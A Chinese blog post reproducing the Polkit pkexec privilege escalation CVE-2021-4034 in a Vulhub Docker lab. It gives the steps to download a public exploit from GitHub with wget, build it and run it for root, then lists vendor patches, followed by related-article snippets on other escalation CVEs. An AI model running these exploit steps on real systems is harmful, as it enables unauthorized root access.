CVE-2021-4034提权漏洞复现

最新推荐文章于 2024-07-22 08:41:22 发布
最新推荐文章于 2024-07-22 08:41:22 发布
阅读量1.5k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: ubuntu linux 运维 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127337945
版权

Polkit 'pkexec'权限提升漏洞(CVE-2021-4034)

Polkit(之前名为PolicyKit)是一个权限相关的套件,pkexec是其中用于以其他用户身份执行命令的工具,它具有suid权限。

当前版本的pkexec中没有正确处理参数和环境变量,导致攻击者可以利用这个Bug劫持环境变量`GCONV_PATH`,进而劫持动态链接库,以root身份执行任意代码。

漏洞环境

因为这个漏洞不是存在于一个服务中,所以Vulhub只是提供了一个包含Polkit(PolicyKit)v0.105版本套件的Ubuntu。

你可以执行下面的命令,进入这个Ubuntu的交互式shell环境中:

docker-compose run --rm cmd bash

此时,执行id命令可以看见,你是普通用户'nobody':

漏洞利用

1.使用[这个项目](https://github.com/berdav/CVE-2021-4034)来利用CVE-2021-4034:

进入tmp目录进行下载

cd /tmp

wget https://github.com/berdav/CVE-2021-4034/archive/refs/heads/main.tar.gz

2.解压下载下来的包

tar -zxvf main.tar.gz

cd CVE-2021-4034-main/

3.make执行(里面对文件进行了编译)

./cve-2021-4034 //执行后,提权成功

漏洞修复

升级polkit版本

目前各Linux发行版官方均已给出安全补丁,建议用户尽快升级至安全版本,或参照官方说明措施进行缓解

Ubuntu:CVE-2021-4034 | Ubuntu

Redhat:Red Hat Customer Portal - Access to 24x7 support and knowledge

Debian:CVE-2021-4034

魏钦6666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-36934:Windows提权漏洞1
08-03
### CVE-2021-36934:Windows提权漏洞详解 #### 一、漏洞概述 CVE-2021-36934(也被称为HiveNightmare)是存在于Windows操作系统中的一个高危本地权限提升(Local Privilege Escalation, LPE)漏洞。该漏洞首次被...
CVE-2021-4034漏洞原理解析
Ays.Ie的博客
11-18 9025
本篇文章主要分析了CVE-2021-4034漏洞,同时介绍了相关知识点以及使用方法,漏洞复现在前渗透测试(七)中体现,记录自己学习过程。
CVE-2021-4034Linux Polkit 权限提升漏洞复现修复
一只爱吃橙子的羊
01-27 2万+
本文仅为验证漏洞,在本地环境测试验证,无其它目的 CVE 编号: CVE-2021-4034 漏洞说明: 近期,国外安全研究团队在 polkit 的 pkexec 中发现存在的本地权限提升漏洞CVE-2021-4034) 关于 Polkit pkexec for Linux Polkit(以前称为 PolicyKit)是一个用于在类 Unix 操作系统中控制系统范围权限的组件。它为非特权进程与特权进程通信提供了一种有组织的方式。也可以使用 polkit 执行具有提升权限的命令,使用命令 pkexec 后
网络安全零基础入门必知必会】之CVE-2021-4034漏洞原理解析(非常详细)零基础入门到精通,收藏这一篇就够了2
最新发布
Libra1313的博客
07-22 807
suid、sgid、sbit是文件权限管理的特殊命令,基本的Linux权限为9个,分别为rwx rwx rwx,利用命令ll -a加文件路径会发现有一些特殊的权限位符号。Linux有十二个权限符 :SUID的基本权限位有x权限,标识符为s,代表数字为4,生效对象为用户位SGID的基本权限位有x权限,标识符为s,代表数字为2,生肖对象为用户组位SBIT的基本权限位有x权限,标识符为t,代表数字为1,生效对象为其他用户这里是学习了看雪论坛的某位大佬对该漏洞的整体分析,然后自己理解进行叙述!
Linux Polkit本地权限提升漏洞处理(CVE-2021- 4034
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
02-07 1万+
一、背景   安全部门近期发出安全预警,提示:常见发现版本的 CentOS、Ubuntu及Debian Linux系统中默认安装的Polkit工具集存在本地权限提升的漏洞CVE-2021- 4034),目前漏洞利用代码已在互联网公开;    Linux Polkit工具集是Linux系统在安装过程中自带的系统工具集,其中包括大量运维常用工具。该工具集中的pkexec在特定情况下无法正确处理调用参数计数,因此会尝试将环境变量作为命令执行。攻击者可以通过控制环境变量,使自身从系统普通用户权限提升至管理员权限,对
网络安全】CVE 漏洞分析以及复现
heikeyouyou的博客
05-22 1172
记一次CVE 漏洞分析以及复现
CVE-2021-4034漏洞复现
热门推荐
weixin_42618425的博客
01-26 2万+
CVE-2021-4034漏洞复现 CVE-2021-4034漏洞描述 最近网上公开了CVE-2021-4034漏洞详情,该漏洞主要是由于 Linux 下 Polkit 工具集的本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权限。目前该漏洞PoC已公开。 影响范围 影响版本:由于 polkit 为系统预装工具,目前主流Linux版本均受影响。 修复版本: CentOS系列: CentOS 6:polkit-0.96-11.el6_10.2 CentOS 7:polkit-0.112-26.el
CVE-2021-26855
03-12
CVE-2021-26855 是一个严重威胁 Microsoft Exchange Server 安全性的漏洞,它通过 SSRF 攻击途径,让攻击者可以轻松地获取服务器的控制权。了解其工作原理、如何利用以及如何防护至关重要。对于不熟悉 Go 语言的 IT ...
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
2. **漏洞复现步骤**: - 首先,你需要在靶机上创建一个新的用户,例如`test`,使用`useradd test`命令。 - 接下来,切换到`test`用户,使用`su test`命令。 - 然后,你需要获取 Dirty Cow 的漏洞利用程序。这...
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复
cve-2021-4034修复复现方法
段帅星的博客
01-29 9699
** 一、cve-2021-4034问题背景 ** 关于 Polkit pkexec for Linux Polkit(以前称为 PolicyKit)是一个用于在类 Unix 操作系统中控制系统范围权限的组件。它为非特权进程与特权进程通信提供了一种有组织的方式。也可以使用 polkit 执行具有提升权限的命令,使用命令 pkexec 后要执行的命令(具有 root 权限)。 PwnKit 漏洞的潜在影响 成功利用此漏洞允许任何非特权用户在易受攻击的主机上获得 root 特权。Qualys 安全研究人员已经能
CVE-2021-4034漏洞详细原理以及复现,polkit的pkexec中的本地提权漏洞
Ba1_Ma0的博客
04-11 5786
简介 一个隐藏了12年的危险漏洞,利用的是polki的pkexec,它是一个 SUID 根程序,默认安装在每个主要的 Linux 发行版 Null 当你在linux下要查看文件时,运行列如像cat这样的程序,并提供test.txt作为参数 所以整个参数数组看起来如下: cat test.txt 0 1 cat是第一个参数索引’0’,第一个参数通常是程序本身的名称,在我们的例子中它是cat 第二个参数是我们刚刚提供带有索引’1’的test.txt的文件名,这些都是字符串 但是在内存中,过程看起来像
CVE-2021-4034Linux Polkit 权限提升漏洞复现修复
Mr_atopos的博客
06-16 3202
CVE-2021-4034 漏洞复现修复
SUID提权CVE-2021-4034漏洞全解析
02-22 1986
本篇是SUID提权系列文章的第三篇。建议大家按顺序先阅读前两篇铺垫。 第一篇我们讲解了SUID提权的基础知识,linux系统的用户、文件权限与进程凭证。 第二篇我们讲解了SUID提权的原理,只要让具有SUID-root权限的程序加载我们的提权so,我们就赢了。 第三篇我们来讲解CVE-2021-4034漏洞的原理以及利用过程。本文会按照下面主题进行分享: 什么是CVECVE-2021-4034介绍 漏洞分析 漏洞利用 漏洞修复 0x1 什么是CVECVE的英文全称是Common Vulnerab
CVE-2021-4034-pkexec本地提权复现
xhwfa的博客
03-20 5338
一、漏洞简述 Trustwave安全和工程团队于1月25日发现了Polkit的pkexec组件中的漏洞,该漏洞被识别为CVE-2021-4034 (PwnKit)。在polkit的pkexec实用程序中发现了一个本地权限提升漏洞。pkexec应用程序是一个setuid工具,旨在允许非特权用户根据预定义的策略以特权用户身份运行命令。当前版本的pkexec无法正确处理调用参数计数,并最终尝试将环境变量作为命令执行。攻击者可以通过制作环境变量来利用这一点,从而诱导pkexec执行任意代码。成功执行后,由于目标计
CVE-2021-4034_Polkit提权漏洞复现修复
Jietewang的博客
06-09 5638
CVE-2021-4034:利用polkit的pkexec进行Linux普通权限提升测试以及CentOS和Ubuntu修复建议
CVE-2021-4034复现
m0_46607055的博客
01-28 409
漏洞分析 问题出在 pkexec 命令上 命令基本格式 pkexec [--user username] program 其含义,以指定用户身份 运行 文件,默认则为root 正常使用,是需要输入密码的。 在 main 函数里,如果传入的命令不是绝对路径,就会在 PATH 环境变量的目录里搜索。 在 534 行的 for 循环从下标 1 开始遍历 argv[]。但 Linux 里 argv 允许只包含一个元素,就是使用 execve 并给 argv 传入 {0},此时 argc 就是
Linux kernel(CVE-2018-17182)提权漏洞复现
06-12
CVE-2018-17182是Linux内核中的一种提权漏洞,攻击者可以利用该漏洞以root权限在系统中执行任意代码。这个漏洞的原因是一个名为"Race Condition"(竞争条件)的问题,通过在内核中利用这个问题,攻击者可以覆盖内核...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值